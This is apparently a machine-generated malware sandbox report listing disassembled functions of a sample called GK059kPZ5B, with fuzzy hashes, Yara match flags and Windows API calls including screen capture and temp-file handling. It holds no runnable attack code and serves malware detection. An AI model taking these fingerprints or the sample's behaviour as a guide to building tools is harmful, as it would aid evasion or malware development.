                                                            • Instruction ID: 80968e5e8bc017810328c9ff139e3a08396a4cd6bf5f0c598f5f88a651707172
                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                            • Instruction Fuzzy Hash: C691743230D0B34ADB29463DA53413FFFE15E523A139A079FE4F2CA2C5EE289954D624
                                                            Function 00A77FEE Relevance: .3, Instructions: 254COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                            • Instruction ID: ad4dbaf80c8c8b6041abaa20a864abc87bb2b9f82ef407cef70500f06c2c5bee
                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                            • Instruction Fuzzy Hash: DA9186722490A34EDB29473A8C7C07EFFE15A523A131AC79DD4FACB5C1EE28C565D620
                                                            Function 00428042 Relevance: .2, Instructions: 244COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                            • Instruction ID: 6d209accfb2b0f61ed35da4827d98296029fd821660f9634528c43e98a7d9207
                                                            • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                            • Instruction Fuzzy Hash: D491933230A0B34ADB69423D947403FFFE15A523A135A079FD4F2CA2C5EE189569E638
                                                            Function 00A782A9 Relevance: .2, Instructions: 244COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                            • Instruction ID: dec846c7b256fc84a755895714a227ecbc661c9b268c8c1928713347a778256f
                                                            • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                            • Instruction Fuzzy Hash: 9B9162722490A34EDB69473E897C03EFFE15A527A131AC79DD4FACE1C1EE28C554E620
                                                            Function 00427AC0 Relevance: .2, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                            • Instruction ID: c950a799e81b9798c69e1fde7feb5263e7a66bddbd8f12dc999fd4da67e98d8e
                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                            • Instruction Fuzzy Hash: 02915F7230D0B34ADB29463EA47403EFFE15A523A539A079FD4F2CB2C1EE189665D624
                                                            Function 00A77D27 Relevance: .2, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                            • Instruction ID: 642409edbf43046a0889c6d4545d8b52c2402697346fe1dae169ba5fe81cf744
                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                            • Instruction Fuzzy Hash: E891517220D0A34EDB294739897447EFFE15E513A131AC79ED4FACB1C5EE14C964DA20
                                                            Function 0042D50E Relevance: .2, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ae41838ee76994b482650b7261a05257237b420b1ccb6a01709a4d1c62f7e11e
                                                            • Instruction ID: bf5b32470415164d0bde1c399ad2a9f6c2d5fa579297b3e458aa86cae917bf69
                                                            • Opcode Fuzzy Hash: ae41838ee76994b482650b7261a05257237b420b1ccb6a01709a4d1c62f7e11e
                                                            • Instruction Fuzzy Hash: 5F6132A1F0073866DB389A287895BBF23949F42748FE0051BE846DB3C1D69D9DC2C75E
                                                            Function 00A7D775 Relevance: .2, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                            • Instruction ID: c4b0954b5257913b7647d28c2ba0412577898a306cf3b03e8162dec5930d4fe6
                                                            • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                            • Instruction Fuzzy Hash: C4617A726007086ADB389B3C8D91BBE63B9AF41704F14C81AEA8FDF6C1D615DD42C356
                                                            Function 00427816 Relevance: .2, Instructions: 232COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                            • Instruction ID: 70ade5293ce95a995033036da66bd690249c8a0141dd443be95812c5f6c87ab8
                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                            • Instruction Fuzzy Hash: 7381827230C0B34AEB29463E957843FFFE15A523A135A179FD4F2CA2C1EE18C694D624
                                                            Function 00A77A7D Relevance: .2, Instructions: 232COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                            • Instruction ID: 639cbb931d44752c195b0755681730bbdc60f151c2838c82d05d174ee3745f57
                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                            • Instruction Fuzzy Hash: 3381547220D0A34DDB6A473A8C7443EFFE15A923A131AC79DD4FBCB1C5EE248964D620
                                                            Function 00428580 Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                            • Instruction ID: 93e5daa5636be076332bd1d1c6ab8ee00e3655dcebceb5ec59e252ebbac9be67
                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                            • Instruction Fuzzy Hash: 69113B7730307153D6048A2DF8B45BF9795EBC53207ED426FD0418B749CE2AE9819508
                                                            Function 00A787E7 Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                            • Instruction ID: ece7a5c0ec1ca379920c56411fbddd777a017c0af88f5596e4c05136f3520192
                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                            • Instruction Fuzzy Hash: 5F11047728104143D6188B3EDCBC6BAA795EAC53A0BACC27AD04D4B658DB2AE944D606
                                                            Function 008697B3 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, Offset: 00869000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_869000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction ID: 6637c70312b47f31191df07de3a0aa8c219ea6da3fefef71d116d89819329787
                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction Fuzzy Hash: 4F113C72340100AFD754DF59DC81FA673EEFB89320B2A80A9ED48CB356E676E841C760
                                                            Function 00A50D90 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction ID: 5cf29e7e33dffc181b52989453c0933aa312a28d628ec202d3ec70f4ff7cd5cd
                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction Fuzzy Hash: 53018F77A006048FDB21CF64C815FAA33B5FB86316F5544A5DD0A97281E774A9498B90
                                                            Function 00402116 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402151
                                                            • GetClientRect.USER32(?,?), ref: 00402166
                                                            • GetDC.USER32(?), ref: 0040216D
                                                            • CreateSolidBrush.GDI32(00646464), ref: 00402180
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00402194
                                                            • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 0040219F
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004021AD
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021C0
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021CB
                                                            • MulDiv.KERNEL32(00000008,00000000), ref: 004021D4
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021F8
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00402206
                                                            • SetBkMode.GDI32(?,00000001), ref: 00402283
                                                            • SetTextColor.GDI32(?,00000000), ref: 00402292
                                                            • _wcslen.LIBCMT ref: 0040229B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                            • String ID: Tahoma
                                                            • API String ID: 3832963559-3580928618
                                                            • Opcode ID: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                            • Instruction ID: 010c8dd0ade12b0eef00d8562bcf10ebda5dfd6cd9d9fcac1ad08c501085cdf2
                                                            • Opcode Fuzzy Hash: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                            • Instruction Fuzzy Hash: E871FD72900228AFDB22DF64DD85FAEB7BCEB09B11F0041A5B609E6151DA74AF81CF14
                                                            Function 00402591 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?), ref: 004025ED
                                                            • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025FF
                                                            • ReleaseCapture.USER32 ref: 00402612
                                                            • GetDC.USER32(00000000), ref: 00402639
                                                            • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026C0
                                                            • CreateCompatibleDC.GDI32(?), ref: 004026C9
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004026D3
                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 00402701
                                                            • ShowWindow.USER32(?,00000000), ref: 0040270A
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 0040271C
                                                            • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402737
                                                            • DeleteFileW.KERNEL32(?), ref: 00402751
                                                            • DeleteDC.GDI32(00000000), ref: 00402758
                                                            • DeleteObject.GDI32(00000000), ref: 0040275F
                                                            • ReleaseDC.USER32(00000000,?), ref: 0040276D
                                                            • DestroyWindow.USER32(?), ref: 00402774
                                                            • SetCapture.USER32(?), ref: 004027C1
                                                            • GetDC.USER32(00000000), ref: 004027F5
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0040280B
                                                            • GetKeyState.USER32(0000001B), ref: 00402818
                                                            • DestroyWindow.USER32(?), ref: 0040282D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                            • String ID: gya
                                                            • API String ID: 2545303185-1989253062
                                                            • Opcode ID: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                            • Instruction ID: e71ef6788f7482d4de425a52166adb2a5dd74d508ff262b25753fab110ccc0fb
                                                            • Opcode Fuzzy Hash: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                            • Instruction Fuzzy Hash: 926181B5900209AFCB289F64ED48FAA7BB9FF49706F144179F605A22A2D774C941CF1C
                                                            Function 0042E6D2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$Info
                                                            • String ID:
                                                            • API String ID: 2509303402-0
                                                            • Opcode ID: fec93888c3f7e73e0eb96cf8028c18e5ced2e8f3fd0cfc5e1e5440814fe90055
                                                            • Instruction ID: ea2a752c51db2b1f33c6fb20177c4d444c994d8588285db844449b2f99ea92ea
                                                            • Opcode Fuzzy Hash: fec93888c3f7e73e0eb96cf8028c18e5ced2e8f3fd0cfc5e1e5440814fe90055
                                                            • Instruction Fuzzy Hash: 7AB1C371A002159FDB11DF6AD841BEEB7F4FF18304F54452FE485AB342D77AA8418B14
                                                            Function 00A7E939 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$Info
                                                            • String ID:
                                                            • API String ID: 2509303402-0
                                                            • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                            • Instruction ID: 68a793b0a6db120b252fd8456aadb92716ce5e8e9cf2009d852836f5bc82bd99
                                                            • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                            • Instruction Fuzzy Hash: BEB19F71900205AFDF21DF68CD82BEEBBF4BF08340F1485ADF999A7242DB7599458B60
                                                            Function 00A70C46 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 136threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00A70C56
                                                            • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00A70CBD
                                                            • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00A70CDA
                                                            • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00A70D40
                                                            • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00A70D55
                                                            • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00A70D67
                                                            • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 00A70D95
                                                            • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00A70DA0
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A70DCC
                                                            • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 00A70DDC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                            • String ID: 11@$%D
                                                            • API String ID: 3720063390-4114847594
                                                            • Opcode ID: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                            • Instruction ID: 115e0a65db3e39d3b1ae8b484138da117ba153e0639cb38fdab9d5d5b0f0557e
                                                            • Opcode Fuzzy Hash: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                            • Instruction Fuzzy Hash: B841D130A00244DBCF15FBA4CA55BED77B5AF05304F14C0A9E94A5B2C3CB799E46C7A2
                                                            Function 0043A618 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0043A65C
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 004399C8
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 004399DA
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 004399EC
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 004399FE
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A10
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A22
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A34
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A46
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A58
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A6A
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A7C
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A8E
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439AA0
                                                            • _free.LIBCMT ref: 0043A651
                                                              • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                              • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                            • _free.LIBCMT ref: 0043A673
                                                            • _free.LIBCMT ref: 0043A688
                                                            • _free.LIBCMT ref: 0043A693
                                                            • _free.LIBCMT ref: 0043A6B5
                                                            • _free.LIBCMT ref: 0043A6C8
                                                            • _free.LIBCMT ref: 0043A6D6
                                                            • _free.LIBCMT ref: 0043A6E1
                                                            • _free.LIBCMT ref: 0043A719
                                                            • _free.LIBCMT ref: 0043A720
                                                            • _free.LIBCMT ref: 0043A73D
                                                            • _free.LIBCMT ref: 0043A755
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                            • Instruction ID: 8150cfcbb8d97c1a634bb94bc0336974ffbd25353871f942fa72eec07d372a2d
                                                            • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                            • Instruction Fuzzy Hash: D4316E315002009EEB219B35D886B5B73E8FF58315F14A51FE4D9CA251DB7AED508B1A
                                                            Function 00A8A87F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 00A8A8C3
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C2F
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C41
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C53
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C65
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C77
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C89
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C9B
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89CAD
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89CBF
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89CD1
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89CE3
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89CF5
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89D07
                                                            • _free.LIBCMT ref: 00A8A8B8
                                                              • Part of subcall function 00A836F1: HeapFree.KERNEL32(00000000,00000000,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?), ref: 00A83707
                                                              • Part of subcall function 00A836F1: GetLastError.KERNEL32(?,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?,?), ref: 00A83719
                                                            • _free.LIBCMT ref: 00A8A8DA
                                                            • _free.LIBCMT ref: 00A8A8EF
                                                            • _free.LIBCMT ref: 00A8A8FA
                                                            • _free.LIBCMT ref: 00A8A91C
                                                            • _free.LIBCMT ref: 00A8A92F
                                                            • _free.LIBCMT ref: 00A8A93D
                                                            • _free.LIBCMT ref: 00A8A948
                                                            • _free.LIBCMT ref: 00A8A980
                                                            • _free.LIBCMT ref: 00A8A987
                                                            • _free.LIBCMT ref: 00A8A9A4
                                                            • _free.LIBCMT ref: 00A8A9BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                            • Instruction ID: 3bf8041e40b9af36d4c55800ef80450b66036c470fea53abc5f6d3f835b5300d
                                                            • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                            • Instruction Fuzzy Hash: 4B316D32608605AFEF20BB3CD946B5AB3E8AF10790F11482AF459D7251EF71AD50CB26
                                                            Function 00439AA9 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                            • Instruction ID: 14d391df4236cd99baad955409263e6980f1ff06ffe499d5f8ebd119726a11a8
                                                            • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                            • Instruction Fuzzy Hash: 16C14772D40205BBDB20DB98CC46FDEB7F8AB4C708F15515AFA04FB282D6B59E418B64
                                                            Function 0042486D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 104threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424886
                                                              • Part of subcall function 00424B55: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245B9), ref: 00424B65
                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042489B
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004248AA
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004248B8
                                                            • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042492E
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042496E
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042497C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                            • String ID: 11@$pContext$switchState
